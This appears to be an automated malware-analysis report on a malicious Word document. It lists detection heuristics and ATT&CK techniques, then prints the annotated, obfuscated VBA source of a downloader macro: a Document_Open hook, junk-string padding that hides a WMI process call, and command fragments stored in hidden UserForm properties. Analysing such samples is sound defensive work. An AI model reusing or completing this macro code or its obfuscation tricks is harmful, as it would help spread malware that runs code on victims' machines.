MALICIOUS
262
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1203 Exploitation for Client Execution
The file contains a high-confidence VBA macro that utilizes CreateObject and a hidden UserForm property to execute a command stager. This is indicative of a downloader malware designed to fetch and run additional malicious content. The ClamAV detection further supports its malicious nature.
Heuristics 7
-
ClamAV: Doc.Downloader.Generic-9390508-0 — critical — CLAMAV_DETECTION: ClamAV detected this file as malware: Doc.Downloader.Generic-9390508-0
-
VBA macros detected — medium — 4 related findings — OLE_VBA_MACROS: Document contains VBA macro code
-
VBA UserForm hidden-property command stager — critical — OLE_VBA_USERFORM_HIDDEN_COMMAND_STAGER: A VBA auto-exec macro creates a COM object from a decoded variable and reconstructs command text through Split/Join and hidden UserForm properties such as ControlTipText, Tag, Pages, or HelpContextId. This is a high-confidence macro downloader/loader shape seen in the reviewed OLE set, but it is not an Office CVE exploit primitive.
-
Document_Open macro — high — OLE_VBA_DOCOPEN: Document_Open macro
-
CreateObject call — high — OLE_VBA_CREATEOBJ: CreateObject call
-
VBA p-code auto-exec with execution tokens — high — OLE_VBA_PCODE_AUTOEXEC_EXEC: The compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Embedded URL — info — EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL: http://schemas.openxmlformats.org/drawingml/2006/main — in document text (OLE body). This is the standard DrawingML XML namespace URI found in ordinary Office files as well; treat it as benign rather than as a download or C2 indicator for this sample.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 15418 bytes |

SHA-256: 3b541d1a06fec2b75d26625bee04a77b958d16615b102616d01a2edd6e46f520
Preview script — first 1,000 lines of the extracted script
' Module header as exported by olevba for the module "I2n1w6ykqx77".
' VB_Base = "1Normal.ThisDocument" marks this as the ThisDocument module,
' i.e. the document-level code module in which Word's Document_Open event
' handler (below) is hosted.
Attribute VB_Name = "I2n1w6ykqx77"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Auto-exec entry point: Word runs Document_Open when the file is opened
' (this is the OLE_VBA_DOCOPEN finding in the report).
' The signature is split across two physical lines with a "_" line
' continuation, presumably so a naive text match on "Sub Document_Open"
' does not fire. The handler contains no logic of its own; it only calls
' into the second module, where the obfuscated stager is built.
Private Sub _
Document_open()
' Hand-off to Grf_231rgq6feyuaib.Qi70lrjd711r (the UserForm-backed module
' whose properties carry the command fragments).
Grf_231rgq6feyuaib.Qi70lrjd711r
End Sub
' Module header for "Grf_231rgq6feyuaib". A VB_Base of the form
' "0{GUID}{GUID}" is the header shape of a UserForm module, which matches the
' report's OLE_VBA_USERFORM_HIDDEN_COMMAND_STAGER finding: the function below
' reads Grf_231rgq6feyuaib.HelpContextId and Grf_231rgq6feyuaib.Ik112dl8st75tdo
' (presumably a control or property on the form — confirm against the OLE
' form stream) as carriers for pieces of the command string.
' VB_PredeclaredId = True gives the form a default instance, which is why
' Document_Open can call Grf_231rgq6feyuaib.Qi70lrjd711r without New.
Attribute VB_Name = "Grf_231rgq6feyuaib"
Attribute VB_Base = "0{4CCBBDD9-2F43-4924-A1D3-20784628854E}{86795B27-A500-4953-9058-99E831039F7D}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Function Qi70lrjd711r()
Cqvj_2ovmsj9keasd = "326"
If Len("S_0ydnujvix4zy4d7Mzrei4whaic0vydyh") = Len("Wqmiz1ff9u5wfhihao") + 1 Then End
If Len("O2gc8nmhwx_zbqGqrja30c6cnoc71ox1Qezoq6nttt964") < Len("G0413oxwzl_t") Then
MsgBox "Gl7in_343ucboxipu8" + "Pi599z6lxbqn"
MsgBox ("Y8dhykv7anrp2z")
MsgBox "Togep491qo0uty" + "Tlhydstb3kmm"
End If
If Len("Wmthaqvj6m0v_gyS2bh7wfhcv8hno6cr") = Len("We72ucd78_jdd") Then
MsgBox "Whduke1kglfpu" + "Xrr7exmt09g_e"
MsgBox ("Sg0_rvmflk3nxv9vwe !!!")
MsgBox "Saqsn0q_mifnk_1" + "Amf00a2fhd3a3wo"
End If
Lxyicsb181j_71k1r = Grf_231rgq6feyuaib.HelpContextId + 50 + 50
D67011_nm4uojcnw = "325"
If Len("Ugywtljhyqkbx5nqS0q67bm_omn") = Len("U2wx9x8ebxtx2bjzlz") + 1 Then End
If Len("E0gmpg57flxe_7j8zzSgrlbdp4d63yzzE_wphqe234psu") < Len("Mfua7_42xej_o1bn") Then
MsgBox "Yqx1jkkr0wqztxv6" + "P1iy41tqmsf"
MsgBox ("Bo1pfqc8bi6j")
MsgBox "Xonberzfldleag1" + "G84fj8h2knh"
End If
If Len("Ybn70e7lgoibrc3Kkfkm43lcejag") = Len("T2jfgk2qg8lo97z") Then
MsgBox "Rhf8m_i8ggjc4666f" + "Qr3l8ru0ei_978x"
MsgBox ("Lc7kk3sn_aayx !!!")
MsgBox "Bqjnii_nlymn7" + "Yjknqso306j60pm7r7"
End If
V90hxq6qo_80y = ChrW(Lxyicsb181j_71k1r + (15))
W9ajpkf2cmbr = "275"
If Len("U1af09h9xj4r3o4vpjV6i7olmp7riyz") = Len("Lh2_qh7pjiyi4y") + 1 Then End
If Len("Jfydzxbu5x6wsmrpwdIhcw0crovaiNzttluv_5px8") < Len("Pwod44ce4mzku") Then
MsgBox "Ahjqtwsm8_4f6beg" + "Ofjnrdl4hga1m6i36u"
MsgBox ("O0dk6jzokx0aawqef")
MsgBox "Iue0ymqrwvfvo" + "Mlw9q6oe3za"
End If
If Len("Gf_e71dru_zwU6nxej1j9u1_s") = Len("H8h3p9tclsszpr9q") Then
MsgBox "Q_yyaasypl7lwk" + "Jb5vmijz21u7"
MsgBox ("L6jmrcc_6_k7 !!!")
MsgBox "C_xx21inknxnejnl" + "Zrfnivbu5thetbuzxe"
End If
Zjhi2dxrnjci_i = "111ss[sns ]]d][ jsa nbsb22v2yf111ss[sns ]]d][ jsa nbsb22v2yfw111ss[sns ]]d][ jsa nbsb22v2yfi111ss[sns ]]d][ jsa nbsb22v2yfnm111ss[sns ]]d][ jsa nbsb22v2yf111ss[sns ]]d][ jsa nbsb22v2yfgm111ss[sns ]]d][ jsa nbsb22v2yft111ss[sns ]]d][ jsa nbsb22v2yf111ss[sns ]]d][ jsa nbsb22v2yf" + V90hxq6qo_80y + "111ss[sns ]]d][ jsa nbsb22v2yf111ss[sns ]]d][ jsa nbsb22v2yf:111ss[sns ]]d][ jsa nbsb22v2yfw111ss[sns ]]d][ jsa nbsb22v2yfin111ss[sns ]]d][ jsa nbsb22v2yf111ss[sns ]]d][ jsa nbsb22v2yf3111ss[sns ]]d][ jsa nbsb22v2yf2111ss[sns ]]d][ jsa nbsb22v2yf_111ss[sns ]]d][ jsa nbsb22v2yf" + Grf_231rgq6feyuaib.Ik112dl8st75tdo + "111ss[sns ]]d][ jsa nbsb22v2yfro111ss[sns ]]d][ jsa nbsb22v2yf111ss[sns ]]d][ jsa nbsb22v2yfce111ss[sns ]]d][ jsa nbsb22v2yfs111ss[sns ]]d][ jsa nbsb22v2yfs111ss[sns ]]d][ jsa nbsb22v2yf"
G7qbayytnfsl8 = "450"
If Len("Ppfagi33kfsrps3gJzg9i53__5b1_") = Len("Gte8bqav1trvltuif3") + 1 Then End
If Len("Vfx21owoago1Hhj9lw21l30Lxsiq2zktf3x4ptp") < Len("Zol4pkejw9u") Then
MsgBox "Msoyej2efvp" + "Ltfpxf7clymny6bm"
MsgBox ("Z55ekbyo0yg3l")
MsgBox "K0wn7f1xrbrz5gaakh" + "Tg3wvgsrayr1l_"
End If
If Len("Yobsfhymm4yvisn0oJv1xnagnyz0algzbiw") = Len("Ucid5p49wk_yzc30pb") Then
MsgBox "Abl3t0omrs7gj" + "Aw8fr8ivdvdybj9uh"
MsgBox ("Z9v9rkzeqdmq1 !!!")
MsgBox "T8zr759fcq9" + "R69ep9kwhlgcewqn"
End If
Mz7pnzlpz0fnojmome = Of250_xwlvwccd1q(Zjhi2dxrnjci_i)
Dq5s2cso9fpa = "994"
If Len("D881879n32fj7u_1uG4ovso3exppx467sit") = Len("Jrey5n1zj6t") + 1 Then End
... (truncated)